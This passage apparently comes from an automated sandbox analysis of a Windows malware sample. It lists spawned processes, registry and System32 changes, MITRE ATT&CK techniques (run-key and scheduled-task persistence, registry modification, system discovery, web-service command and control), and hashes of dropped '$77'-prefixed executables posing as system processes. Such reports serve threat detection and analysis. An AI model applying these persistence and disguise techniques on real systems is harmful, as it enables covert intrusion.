- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1920

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4552

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4760

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:884

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3912

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:3484

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:1900

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4944

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:2400

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4136

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-penisware.exe.log
Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
Filesize
1KB

MD5
183dd1cd0014293865e135951d0197ab

SHA1
268bba2c9c82727b1b32857e67ec26af46ad4cc6

SHA256
2f46685bdaf0f2e29ea07f3967a99785e9eab1add962f357acfc68b53545057e

SHA512
c6fb59e54c4934bd4018ac404a7cd4d5ab6f1687b8e73c9a54d16f0158381f0d8c41160cd8f7f11ecff0da84f3b278beb5a224c7423a8623be617cf7ec63b271

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4DE1.tmp.bat
Filesize
155B

MD5
ff6c6ce211dd1f5e2945ee78a72d93ae

SHA1
4a72011e5aa2706947e87bea94cf494ba13a0890

SHA256
fb3c998445ea8d96bc39118ce34b681eb73a43c9f6b74c57ea89e4f1d56613a1

SHA512
e998b259effc04f779d4e9a4c35d7c77ec7577a7235358baa8e1e1e6c0926ab040653946b44ae2c89d83a73030c4ac729d2b71a1e74b9138891810312e68443d

Download Submit
C:\Windows\Resources\$77-install.exe
Filesize
163KB

MD5
1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Windows\Resources\$77-penisware.exe
Filesize
443KB

MD5
d2b0fd7476f280dc1d8d085d693b37f8

SHA1
6d8cd2158d77f33b7c320984cedbbf3ac7c8513c

SHA256
c05c71085a3ff83980a530aa77c500b98610f4e934315b6831448b96a45d9067

SHA512
d3fd2bfe426b9c9a1c83e3b03fd0f6c32e07c236116f4319305adbe8e323be506cc92a390e7d86e0355618df995474455c26f8de24831283902e90c38853bf41

Download Submit
C:\Windows\Resources\$77-penisware2.exe
Filesize
256KB

MD5
18f497deffe88b6b2cff336a277aface

SHA1
4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

SHA256
8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

SHA512
35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

Download Submit
C:\Windows\Resources\$77-scchost.exe
Filesize
545KB

MD5
9c17bdda52e21d8df835cee315b506dd

SHA1
f01ccf02c4b92dc8e261da1e48f54ccd548c8af0

SHA256
f8bcd12f0b30a378747069cc28aaae74d30aafc33656152ee34f818a10e8973f

SHA512
7acd79e169949ef7445230ea474a38786cda317469be340fa94b83dcf26b0025b0baff45ff37c88c632ceaef6565a503d7f19d3884c467f8d68c28f86c3f9889

Download Submit
C:\Windows\Resources\$77-sdchost.exe
Filesize
508KB

MD5
3f7291a1225138608a020a1e3ccc4740

SHA1
77bc47fd739a3efb3f22b590b6acb4e101d78c61

SHA256
b07657bb984766acf4f99a7645f6da9a251e2dc3afc839a6ae7f049605b87011

SHA512
03c622b528930e70d103a7ccfe8405cea333e5801a8bded99555bb58819b67ee5dcdb0861a3bc17afd5903b392f0a7a766047dbccd1674203c61238cd65f39e7

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_lwqvbyvu.znc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/332-100-0x00007FFDC6730000-0x00007FFDC6740000-memory.dmp

Filesize
64KB

Download
memory/332-93-0x000002EE8ABF0000-0x000002EE8AC1B000-memory.dmp

Filesize
172KB

Download
memory/332-99-0x000002EE8ABF0000-0x000002EE8AC1B000-memory.dmp

Filesize
172KB

Download
memory/464-19-0x00000000002F0000-0x0000000000376000-memory.dmp

Filesize
536KB

Download
memory/624-58-0x0000018F7C1D0000-0x0000018F7C1F5000-memory.dmp

Filesize
148KB

Download
memory/624-59-0x0000018F7C200000-0x0000018F7C22B000-memory.dmp

Filesize
172KB

Download
memory/624-60-0x0000018F7C200000-0x0000018F7C22B000-memory.dmp

Filesize
172KB

Download
memory/624-66-0x0000018F7C200000-0x0000018F7C22B000-memory.dmp

Filesize
172KB

Download
memory/624-67-0x00007FFDC6730000-0x00007FFDC6740000-memory.dmp

Filesize
64KB

Download
memory/680-77-0x0000018BCA9B0000-0x0000018BCA9DB000-memory.dmp

Filesize
172KB

Download
memory/680-71-0x0000018BCA9B0000-0x0000018BCA9DB000-memory.dmp

Filesize
172KB

Download
memory/680-78-0x00007FFDC6730000-0x00007FFDC6740000-memory.dmp

Filesize
64KB

Download
memory/740-104-0x00000219CC160000-0x00000219CC18B000-memory.dmp

Filesize
172KB

Download
memory/956-89-0x00007FFDC6730000-0x00007FFDC6740000-memory.dmp

Filesize
64KB

Download
memory/956-82-0x00000263DC040000-0x00000263DC06B000-memory.dmp

Filesize
172KB

Download
memory/956-88-0x00000263DC040000-0x00000263DC06B000-memory.dmp

Filesize
172KB

Download
memory/1248-52-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1248-48-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1248-53-0x00007FFE066B0000-0x00007FFE068A5000-memory.dmp

Filesize
2.0MB

Download
memory/1248-54-0x00007FFE04700000-0x00007FFE047BE000-memory.dmp

Filesize
760KB

Download
memory/1248-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1248-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1248-47-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1248-55-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3104-21-0x0000000002D00000-0x0000000002D06000-memory.dmp

Filesize
24KB

Download
memory/3104-20-0x0000000000D60000-0x0000000000DA6000-memory.dmp

Filesize
280KB

Download
memory/3988-15-0x00000000003C0000-0x0000000000436000-memory.dmp

Filesize
472KB

Download
memory/4176-44-0x00007FFE04700000-0x00007FFE047BE000-memory.dmp

Filesize
760KB

Download
memory/4176-43-0x00007FFE066B0000-0x00007FFE068A5000-memory.dmp

Filesize
2.0MB

Download
memory/4176-42-0x000001DBF79E0000-0x000001DBF7A0A000-memory.dmp

Filesize
168KB

Download
memory/4176-27-0x000001DBF7630000-0x000001DBF7652000-memory.dmp

Filesize
136KB

Download
memory/5012-14-0x0000000000940000-0x00000000009CE000-memory.dmp

Filesize
568KB

Download